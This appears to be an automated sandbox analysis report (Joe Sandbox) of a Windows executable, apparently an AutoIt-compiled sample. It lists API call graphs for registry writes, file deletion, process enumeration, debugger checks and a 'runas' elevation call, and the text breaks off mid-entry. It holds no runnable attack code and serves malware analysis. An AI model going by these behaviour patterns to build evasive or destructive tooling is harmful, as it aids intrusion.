__wsopen_s 26 API calls 101394 c88a92 CloseHandle 101391->101394 101392 c88aac 101395 c88ace 101392->101395 101427 c7f633 20 API calls __dosmaperr 101392->101427 101396 c88a7d 101393->101396 101394->101389 101397 c88a9e GetLastError 101394->101397 101395->101331 101399 c85754 __wsopen_s 26 API calls 101396->101399 101397->101389 101399->101400 101400->101389 101400->101391 101401->101334 101402->101338 101403->101336 101407 c90777 101404->101407 101405 c90792 101405->101346 101407->101405 101417 c7f669 20 API calls __dosmaperr 101407->101417 101408 c907b6 101418 c82b7c 26 API calls __wsopen_s 101408->101418 101410 c907c1 101410->101346 101411->101348 101412->101351 101413->101355 101414->101350 101415->101354 101416->101360 101417->101408 101418->101410 101419->101365 101425 c83336 LeaveCriticalSection 101420->101425 101422 c856c1 101422->101368 101423->101369 101424->101372 101425->101422 101426->101392 101427->101395 101428 c51098 101433 c55d78 101428->101433 101432 c510a7 101434 c5bf07 8 API calls 101433->101434 101435 c55d8f GetVersionExW 101434->101435 101436 c584b7 8 API calls 101435->101436 101437 c55ddc 101436->101437 101438 c596d9 8 API calls 101437->101438 101447 c55e12 101437->101447 101439 c55e06 101438->101439 101441 c579ed 8 API calls 101439->101441 101440 c55ecc GetCurrentProcess IsWow64Process 101442 c55ee8 101440->101442 101441->101447 101443 c55f00 LoadLibraryA 101442->101443 101444 c950f2 GetSystemInfo 101442->101444 101445 c55f11 GetProcAddress 101443->101445 101446 c55f4d GetSystemInfo 101443->101446 101445->101446 101449 c55f21 GetNativeSystemInfo 101445->101449 101450 c55f27 101446->101450 101447->101440 101448 c950ad 101447->101448 101449->101450 101451 c5109d 101450->101451 101452 c55f2b FreeLibrary 101450->101452 101453 c70433 29 API calls __onexit 101451->101453 101452->101451 101453->101432 101454 c5105b 101459 c5522e 101454->101459 101456 c5106a 101490 c70433 29 API calls __onexit 101456->101490 101458 c51074 101460 c5523e __wsopen_s 
101459->101460 101461 c5bf07 8 API calls 101460->101461 101462 c552f4 101461->101462 101463 c5551b 10 API calls 101462->101463 101464 c552fd 101463->101464 101491 c551bf 101464->101491 101467 c565a4 8 API calls 101468 c55316 101467->101468 101469 c5684e 8 API calls 101468->101469 101470 c55325 101469->101470 101471 c5bf07 8 API calls 101470->101471 101472 c5532e 101471->101472 101473 c5bceb 8 API calls 101472->101473 101474 c55337 RegOpenKeyExW 101473->101474 101475 c94bc0 RegQueryValueExW 101474->101475 101479 c55359 101474->101479 101476 c94bdd 101475->101476 101477 c94c56 RegCloseKey 101475->101477 101478 c7019b 8 API calls 101476->101478 101477->101479 101485 c94c68 _wcslen 101477->101485 101480 c94bf6 101478->101480 101479->101456 101481 c541a6 8 API calls 101480->101481 101482 c94c01 RegQueryValueExW 101481->101482 101483 c94c1e 101482->101483 101487 c94c38 messages 101482->101487 101484 c584b7 8 API calls 101483->101484 101484->101487 101485->101479 101486 c5627c 8 API calls 101485->101486 101488 c5b25f 8 API calls 101485->101488 101489 c5684e 8 API calls 101485->101489 101486->101485 101487->101477 101488->101485 101489->101485 101490->101458 101492 c922f0 __wsopen_s 101491->101492 101493 c551cc GetFullPathNameW 101492->101493 101494 c551ee 101493->101494 101495 c584b7 8 API calls 101494->101495 101496 c5520c 101495->101496 101496->101467 101497 ca55f4 101498 c6e34f 8 API calls 101497->101498 101499 ca560a 101498->101499 101503 ca5685 101499->101503 101506 c6a9e5 9 API calls 101499->101506 101501 ca5665 101501->101503 101507 cc2393 8 API calls 101501->101507 101504 ca617b 101503->101504 101508 cc3ef6 81 API calls __wsopen_s 101503->101508 101506->101501 101507->101503 101508->101504

                                                              Control-flow Graph

                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00C55DA7
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              • GetCurrentProcess.KERNEL32(?,00CEDC2C,00000000,?,?), ref: 00C55ED3
                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C55EDA
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C55F05
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C55F17
                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C55F25
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C55F2C
                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00C55F51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                              • API String ID: 3290436268-3101561225
                                                              • Opcode ID: 58eea4fd76fd6b3ebebf0f8f0bc88bc9ab51fc92dbbda7637fb0558bbf36b548
                                                              • Instruction ID: 8f3fea80c5477adeb37d043907ffef619f3560f924d0a4f6fdbb59dbf78fcf98
                                                              • Opcode Fuzzy Hash: 58eea4fd76fd6b3ebebf0f8f0bc88bc9ab51fc92dbbda7637fb0558bbf36b548
                                                              • Instruction Fuzzy Hash: 73A1A23680A7C1EFCB36CBA97C455B97FA46B36301B04589DF891D7321C26D4A8ACB35

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,771A8FB0,?,00000000), ref: 00CC9FC0
                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00CC9FFE
                                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00CCA018
                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00CCA030
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA03B
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCA057
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCA0A7
                                                              • SetCurrentDirectoryW.KERNEL32(00D17B94), ref: 00CCA0C5
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCA0CF
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA0DC
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA0EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1409584000-438819550
                                                              • Opcode ID: bba07cfbdd9c5a7febf8436f7baae7ea1971949a900d03180ac9aa75c7d6fe12
                                                              • Instruction ID: 6110ef7a4a82e1436ac05a0cf05bc7d173c54da98074d392facdfe631a8bff89
                                                              • Opcode Fuzzy Hash: bba07cfbdd9c5a7febf8436f7baae7ea1971949a900d03180ac9aa75c7d6fe12
                                                              • Instruction Fuzzy Hash: D831C33260025D7FDB109FB5EC4DFDE73ACAF053A4F104159E916E60A0DB75DE849A22

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C532EF,?), ref: 00C53342
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C532EF,?), ref: 00C53355
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D22418,00D22400,?,?,?,?,?,?,00C532EF,?), ref: 00C533C1
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                                • Part of subcall function 00C541E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C533E9,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C54227
                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C53442
                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C93C8A
                                                              • SetCurrentDirectoryW.KERNEL32(?,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C93CCB
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D131F4,00D22418,?,?,?,?,?,?,?,00C532EF), ref: 00C93D54
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C93D5B
                                                                • Part of subcall function 00C5345A: GetSysColorBrush.USER32(0000000F), ref: 00C53465
                                                                • Part of subcall function 00C5345A: LoadCursorW.USER32(00000000,00007F00), ref: 00C53474
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(00000063), ref: 00C5348A
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(000000A4), ref: 00C5349C
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(000000A2), ref: 00C534AE
                                                                • Part of subcall function 00C5345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C534C6
                                                                • Part of subcall function 00C5345A: RegisterClassExW.USER32(?), ref: 00C53517
                                                                • Part of subcall function 00C5353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,VARGETTYPE,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C53568
                                                                • Part of subcall function 00C5353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C53589
                                                                • Part of subcall function 00C5353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C5359D
                                                                • Part of subcall function 00C5353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C535A6
                                                                • Part of subcall function 00C538F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C539C3
                                                              Strings
                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C93C84
                                                              • runas, xrefs: 00C93D4F
                                                              • AutoIt, xrefs: 00C93C7F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                              • API String ID: 683915450-2030392706
                                                              • Opcode ID: fea62f30b7a038e0fd4c2caaa1153f59441c635995478235d42ae98a0b1e0c8a
                                                              • Instruction ID: 57452d8194a35161a527a5d0a1d1518ebca0e75e6d7f1b62582311fc1277d912
                                                              • Opcode Fuzzy Hash: fea62f30b7a038e0fd4c2caaa1153f59441c635995478235d42ae98a0b1e0c8a
                                                              • Instruction Fuzzy Hash: AD51E934108385BEC715FF60EC5597E7BA49BA4745F40051CF891962A2DB348BCEE736

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBD8E2
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00CBD99D
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CBD9B0
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CBD9CD
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00CBD9F7
                                                                • Part of subcall function 00CBDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00CBD9DC,?,?), ref: 00CBDA72
                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00CBDA13
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDA24
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 1946585618-1173974218
                                                              • Opcode ID: ee8405dda92091c72755cc15c11efc454b759e16aeb986150a6ce3aca5a69cc9
                                                              • Instruction ID: 738817eb7cb4e3e22e2012fab6f0e77359d3bf32187e417614431b1da88232e8
                                                              • Opcode Fuzzy Hash: ee8405dda92091c72755cc15c11efc454b759e16aeb986150a6ce3aca5a69cc9
                                                              • Instruction Fuzzy Hash: DE616B35C0114DABCF05EBE0DA92AEDBBB5AF14301F644165E812B71A2EB315F4DEB60
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBDBE0
                                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00CBDC30
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CBDC41
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDC58
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDC61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 8ef69e3fba8225be771eeb8bb436da732f0a9dfa5b42283699cd77366bec5712
                                                              • Instruction ID: 389d47f5c689da95fbe45d2cea8463c6cc2749e47541d3f40061610e54e83d43
                                                              • Opcode Fuzzy Hash: 8ef69e3fba8225be771eeb8bb436da732f0a9dfa5b42283699cd77366bec5712
                                                              • Instruction Fuzzy Hash: EB316F350083859BC701EB64D8919EFBBE8BE91301F444A1DF8E2871A1EB60DE4DDB66
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00CBDCC1
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00CBDCCF
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00CBDCEF
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00CBDD9C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: 6976024c64795b8add4795a789ee7d2bb3ad679fe0f3e9a7df46037741690c46
                                                              • Instruction ID: f6724183f81e8e17cee617c0671c7de8fd17760fe90ef69956880569f685466c
                                                              • Opcode Fuzzy Hash: 6976024c64795b8add4795a789ee7d2bb3ad679fe0f3e9a7df46037741690c46
                                                              • Instruction Fuzzy Hash: C13193751083449FC301EF60DC85BAFBBF8AF99350F04092DF582861A1EB719A89DB92
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,00C94686), ref: 00CBE397
                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00CBE3A6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBE3B7
                                                              • FindClose.KERNEL32(00000000), ref: 00CBE3C3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                              • String ID:
                                                              • API String ID: 2695905019-0
                                                              • Opcode ID: 40e8843085a4f500ad4bf7437a3a2806c191bb9989f27d48b5a2075b6655c683
                                                              • Instruction ID: 7b63e39933f1dc88f3a01f7d85994d2c5e8d154dce39fb67cd566f6aaca3e90e
                                                              • Opcode Fuzzy Hash: 40e8843085a4f500ad4bf7437a3a2806c191bb9989f27d48b5a2075b6655c683
                                                              • Instruction Fuzzy Hash: BFF0E530411A206BC211673CAC8D9EE77ED9E41335F104711F936C71F0D7B0DE954695
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C75099
                                                              • TerminateProcess.KERNEL32(00000000,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C750A0
                                                              • ExitProcess.KERNEL32 ref: 00C750B2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: b076ad624402c2826558ec8adb87e9a3cd2a070bb8962a0b246ecedf1960bd3c
                                                              • Instruction ID: c38d957fda906a0ba4f53552d3efccf365a4b1d12ece046f3a613d869c0869d9
                                                              • Opcode Fuzzy Hash: b076ad624402c2826558ec8adb87e9a3cd2a070bb8962a0b246ecedf1960bd3c
                                                              • Instruction Fuzzy Hash: 0EE0B635400588AFCF216F54DE49F5C3B79FB40791F008014F81A8A132DB76EE42DB90
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00CAE60A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID: X64
                                                              • API String ID: 2645101109-893830106
                                                              • Opcode ID: 67b2421fc47b56e957611a9f455ec581bf5867a2bddd38a36fd7ff232db204fd
                                                              • Instruction ID: 3c16c6f36a58a119038097fd6a60c88e8e3693dae33b33e2896fb663439d4f63
                                                              • Opcode Fuzzy Hash: 67b2421fc47b56e957611a9f455ec581bf5867a2bddd38a36fd7ff232db204fd
                                                              • Instruction Fuzzy Hash: 4DD0C9B480511DEACBA0CBA0DCC8EDD777CBB14304F104552F106A2040DB3095488B50

                                                              Control-flow Graph

                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDCE1C
                                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00CEDCD0,00000000,?,00000000,?,?), ref: 00CDCEA3
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CDCF03
                                                              • _wcslen.LIBCMT ref: 00CDCF53
                                                              • _wcslen.LIBCMT ref: 00CDCFCE
                                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00CDD011
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CDD120
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CDD1AC
                                                              • RegCloseKey.KERNELBASE(?), ref: 00CDD1E0
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDD1ED
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CDD2BF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 9721498-966354055
                                                              • Opcode ID: 15203115f868c6321c163375ed8b73a94c91790ad7eac5fb1eb63ae579eaeac4
                                                              • Instruction ID: 7f5a562f4e2c182f370751514fb07b4ca136945e4191744144e9c9a89ee1ec7d
                                                              • Opcode Fuzzy Hash: 15203115f868c6321c163375ed8b73a94c91790ad7eac5fb1eb63ae579eaeac4
                                                              • Instruction Fuzzy Hash: 231268396042019FCB14DF24C881B2AB7E5FF88724F04845DF99A9B3A2CB71ED85DB85

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 0-1645009161
                                                              • Opcode ID: 8e166793d3065290b1d6cf40f3f4c14e41d31b8deb0baf348f36199ac1f678c7
                                                              • Instruction ID: 71a62e4abab3eedbcf1de2cfa974e750f5db115a95aa4a5922daa05c2e125077
                                                              • Opcode Fuzzy Hash: 8e166793d3065290b1d6cf40f3f4c14e41d31b8deb0baf348f36199ac1f678c7
                                                              • Instruction Fuzzy Hash: 2D811771A40245BBDF15AF61DC47FAE3BA8EF05741F004020FD099A192EB70DB9AE759
                                                              APIs
                                                              • GetInputState.USER32 ref: 00C5EEB7
                                                              • timeGetTime.WINMM ref: 00C5F0B7
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F1D8
                                                              • TranslateMessage.USER32(?), ref: 00C5F22B
                                                              • DispatchMessageW.USER32(?), ref: 00C5F239
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F24F
                                                              • Sleep.KERNELBASE(0000000A), ref: 00C5F261
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
